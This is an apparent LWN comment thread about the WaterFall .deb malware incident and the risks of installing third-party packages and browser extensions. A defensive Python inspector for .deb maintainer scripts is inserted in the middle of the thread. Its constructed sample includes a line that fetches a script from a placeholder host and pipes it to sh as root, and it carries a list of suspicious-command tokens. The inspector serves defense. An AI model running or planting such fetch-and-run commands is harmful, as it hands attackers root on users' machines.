Linux malware: an incident and some solutions

Posted Dec 24, 2009 12:49 UTC (Thu) by rickmoen (subscriber, #6943)
Parent article: Linux malware: an incident and some solutions

It's unfortunate that nearly all articles about Unix malware start by thrashing the same stupid straw man about "Linux users like to think that they are not vulnerable". Any operating system that permits the user to destroy his/her own system's security is "vulnerable" in that trivial and rather meaningless sense of the word, and Unix furnishes the rope to hang yourself, spare blocks and tackles, and a few rope factories and foundries in case you want to make more.

So, when has it ever not been the case that "they too should be careful"?

The .deb was "on" in the technical sense that it was made available by its third-party author at some URL of the form files/[something].deb, but even a cursory look at the site should have revealed to any member of the public that the site maintainers do effectively zero quality control, that it's an automated "portal" where "Everyone can upload and download artwork, applications, documents and other files."

So, it should have been obvious that the downloaded file was from nobody in particular, for starters -- but then there's the fact that it's a .deb, which requires root/sudo to install, and inherently supports preinst/postinst scripts, run as root.

None of which in the least differs from Koen Vervloesem's point that "An incident like the WaterFall malware can only be avoided when users are trained not to trust third-party software blindly", which is well taken, but there's only so much that can be done to dissuade novice sysadmins from destroying their systems. If they're willing to install as the root user software from unknown parties on the Internet just so they can have "the newest screen savers, themes, and other software to spice up their desktop", the best you can do is gently point them to the CERT document on recovery from root compromise and say "Gosh, it hurts when you shoot at your own foot, doesn't it?"

Even with "more software than the official repositories have", if it's not alleged screensavers, it'll be alleged Internet poker games, alleged video codecs for porn, alleged "birthday cards", etc. -- or various and sundry add-on Web apps.

The only way out is to keep reminding users they're responsible for whom they trust and what processes they run, teach them not to aim that gun at their feet, and teach them how to recognise that type of foot wound and how it got there.

Rick Moen
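One defender-side check for the point above, that a .deb needs root to install and carries preinst/postinst scripts that dpkg runs as root: a small Python inspector, added here as an example and not part of Rick Moen's comment or of LWN, that opens a .deb (an ar archive holding control.tar.*), pulls out the maintainer scripts, and lists the lines a person should read before typing sudo. The sample package, the token list and the example.invalid URL are all constructed for the demonstration.

```python
import io
import tarfile

MAINTAINER_SCRIPTS = ("preinst", "postinst", "prerm", "postrm")  # dpkg runs these as root
SUSPECT_TOKENS = ("curl ", "wget ", "| sh", "| bash", "chmod +s", "/etc/cron")

def ar_members(blob):
    # A .deb is a plain 'ar' archive: 8-byte magic, then 60-byte member headers + data.
    if not blob.startswith(b"!<arch>\n"):
        raise ValueError("not an ar archive")
    pos = 8
    while pos + 60 <= len(blob):
        hdr = blob[pos:pos + 60]
        name = hdr[0:16].decode("ascii").rstrip(" /")  # GNU ar may append '/'
        size = int(hdr[48:58])
        yield name, blob[pos + 60:pos + 60 + size]
        pos += 60 + size + (size % 2)                  # members start on even offsets

def maintainer_scripts(deb):
    # Return {script_name: text} for every maintainer script in the control tarball.
    found = {}
    for name, data in ar_members(deb):
        if name.startswith("control.tar"):
            with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
                for m in tf.getmembers():
                    base = m.name.lstrip("./")
                    if m.isfile() and base in MAINTAINER_SCRIPTS:
                        found[base] = tf.extractfile(m).read().decode("utf-8", "replace")
    return found

def review(deb):
    # (script, line_no, line) for each script line a human should read before installing.
    return [(script, n, line.strip())
            for script, text in maintainer_scripts(deb).items()
            for n, line in enumerate(text.splitlines(), 1)
            if any(tok in line for tok in SUSPECT_TOKENS)]

def build_sample_deb(postinst):
    # Construct a minimal .deb in memory (sample data only, not a real package).
    body, buf = postinst.encode(), io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        info = tarfile.TarInfo("./postinst")
        info.size, info.mode = len(body), 0o755
        tf.addfile(info, io.BytesIO(body))
    def member(name, data):  # ar header fields: name, mtime, uid, gid, mode, size, magic
        hdr = f"{name:<16}{0:<12}{0:<6}{0:<6}{'100644':<8}{len(data):<10}`\n".encode("ascii")
        return hdr + data + (b"\n" if len(data) % 2 else b"")
    return b"!<arch>\n" + member("debian-binary", b"2.0\n") + member("control.tar.gz", buf.getvalue())

SAMPLE_POSTINST = ("#!/bin/sh\nset -e\nupdate-desktop-database || true\n"   # constructed sample:
                   "wget -qO- http://example.invalid/setup.sh | sh\n")       # fetch-and-run as root
```

On a Debian system `dpkg-deb -e pkg.deb outdir` extracts the same control scripts for reading by hand; the flagged line in the constructed sample is the kind of thing that turns a "screensaver" into a root compromise.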


Linux malware: an incident and some solutions

Posted Dec 24, 2009 19:11 UTC (Thu) by rickmoen (subscriber, #6943)

And, I forgot to mention: Firefox extensions. I note that the Mozilla Organization's "portal" site contributes substantially to the problem of dangerous user attitudes, by having no entry about source code or licensing on any of the extension entries, but a large, prominent button marked "Download Now" on each. I've encountered Linux users who've been completely unaware that what they fetched via that site was proprietary software from nobody in particular, that they would not have trusted with their user-level security access if they'd been thinking more clearly.

I suggest we of the Linux community work harder to get out the message that, e.g., just because we recommend Adblock and NoScript, that doesn't mean we recommend downloading arbitrary extensions from any-old-where, and that, when we provide URLs to Adblock and NoScript's upstream Web sites, we don't mean you should get it from there: You should get maintained, audited packages from your distro maintainers, where available -- and assume code is dangerous unless you have reason to think it isn't.

Rick Moen

NoScript and Adblock

Posted Dec 25, 2009 3:10 UTC (Fri) by pflugstad (subscriber, #224)

I completely agree with you. But then you went and mentioned NoScript and AdBlock:

NoScript and Adblock

Posted Dec 26, 2009 7:48 UTC (Sat) by rickmoen (subscriber, #6943)

Pete wrote:

{shrug} The best solution to upstream antics is the one Jake Edge mentions, distro packages, which I always strongly, strongly encourage Linux newcomers to favour over going to upstream (absent rare reasons to the contrary). But NoScript / Adblock even with upstream antics are better than lacking them. Fortunately, both extensions are open source -- as many extensions advertised on are not.

(My view, yours for a small royalty fee and waiver of reverse-engineering rights).

Rick Moen

Copyright © 2017, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds